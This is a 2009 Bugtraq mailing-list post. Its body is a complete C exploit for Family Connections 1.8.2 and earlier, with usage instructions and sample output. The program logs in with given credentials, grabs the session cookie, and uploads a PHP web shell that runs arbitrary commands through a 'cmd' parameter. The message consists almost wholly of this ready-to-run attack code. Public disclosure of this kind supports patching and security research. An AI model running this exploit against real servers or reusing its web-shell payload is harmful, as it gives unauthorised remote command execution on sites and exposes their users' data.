[<prev] [next>] [day] [month] [year] [list]
Message-ID: <48317b000904030913k1b6e9fa5rdfb48d2d2966108@mail.gmail.com>
Date: Fri, 3 Apr 2009 18:13:15 +0200
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@...il.com>
To: Bugtraq <bugtraq@...urityfocus.com>, str0ke <str0ke@...w0rm.com>
Subject: Family Connections <= 1.8.2 - Remote Shell Upload Exploit
/*
Family Connections <= 1.8.2 - Remote Shell Upload Exploit
Author: Salvatore "drosophila" Fresta
Contact: drosophilaxxx@...il.com
Date: 3 April 2009
The following software will upload a simple php shell.
To execute remote commands, you must open the file
using a browser.
gcc rsue.c -o rsue
./rsue localhost /fcms/ user password
[*] Connecting...
[+] Connected
[*] Send login...
[+] Login Successful
[+] Uploading...
[+] Shell uploaded
[+] Connection closed
Open your browser and go to
http://localhost/fcms/gallery/documents/shell.php?cmd=[commands]
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
sock.sin_addr = *((struct in_addr *)host->h_addr);
if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
return fd;
}
int socket_send(int socket, char *buffer, size_t size) {
if(socket < 0) return -1;
return write(socket, buffer, size) < 0 ? -1 : 0;
}
char *socket_receive(int socket, int tout) {
fd_set input;
int ret, byte;
char *buffer, *tmp;
struct timeval timeout;
FD_ZERO(&input);
FD_SET(socket, &input);
if(tout > 0) {
timeout.tv_sec = tout;
timeout.tv_usec = 0;
}
if(socket < 0) return NULL;
if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL;
while (1) {
if(tout > 0)
ret = select(socket + 1, &input, NULL, NULL, &timeout);
else
ret = select(socket + 1, &input, NULL, NULL, NULL);
if (!ret) break;
if (ret < 0) return NULL;
if(!(tmp = (char *) calloc (1024, sizeof (char)))) return NULL;
if ((byte=read(socket, tmp, 1024)) < 0) return NULL;
if(!byte) break;
if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen
(tmp)))) return NULL;
strncat(buffer, tmp, strlen(buffer)+strlen(tmp));
}
return buffer;
}
void usage(char *bn) {
printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
"Author: Salvatore \"drosophila\" Fresta\n\n"
"usage: %s <server> <path> <username> <password>\n"
"example: %s localhost /fcms/ admin 123456\n\n", bn, bn);
}
int main(int argc, char *argv[]) {
int sd;
char code[] = "--AaB03x\r\n"
"Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
"Content-Type: text/plain\r\n"
"\r\n"
"<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; name=\"desc\"\r\n"
"\r\n"
"description\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; name=\"submitadd\"\r\n"
"\r\n"
"Submit\r\n"
"--AaB03x--\r\n",
*buffer = NULL,
*rec = NULL,
*session = NULL;
if(argc < 5) {
usage(argv[0]);
return -1;
}
if(!(buffer = (char
*)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]),
sizeof(char)))) {
perror("calloc");
return -1;
}
sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login",
argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3],
argv[4]);
printf("\n[*] Connecting...");
if((sd = socket_connect(argv[1], 80)) < 0) {
printf("[-] Connection failed!\n\n");
free(buffer);
return -1;
}
printf("\n[+] Connected"
"\n[*] Send login...");
if(socket_send(sd, buffer, strlen(buffer)) < 0) {
printf("[-] Sending failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!(rec = socket_receive(sd, 0))) {
printf("[-] Receive failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!strstr(rec, "Login Successful")) {
printf("\n[-] Login Incorrect!\n\n");
free(buffer);
close(sd);
return -1;
}
session = strstr(rec, "PHPSESSID");
session = strtok(session, ";");
if((sd = socket_connect(argv[1], 80)) < 0) {
printf("[-] Connection failed!\n\n");
free(buffer);
return -1;
}
printf("\n[+] Login Successful"
"\n[+] Uploading...");
sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Cookie: %s\r\n"
"Content-type: multipart/form-data, boundary=AaB03x\r\n"
"Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session,
strlen(code), code);
if(socket_send(sd, buffer, strlen(buffer)) < 0) {
printf("[-] Sending failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!(rec = socket_receive(sd, 0))) {
printf("[-] Receive failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!strstr(rec, "Uploaded Successfully")) {
printf("\n[-] Upload failed!\n\n");
free(buffer);
close(sd);
return -1;
}
free(buffer);
close(sd);
printf("\n[+] Shell uploaded"
"\n[+] Connection closed\n\n"
"Open your browser and go to
http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1],
argv[2]);
return 0;
}
--
Salvatore "drosophila" Fresta
CWNP444351
Download attachment "rsue.c" of type "application/octet-stream" (5253 bytes)
Powered by blists - more mailing lists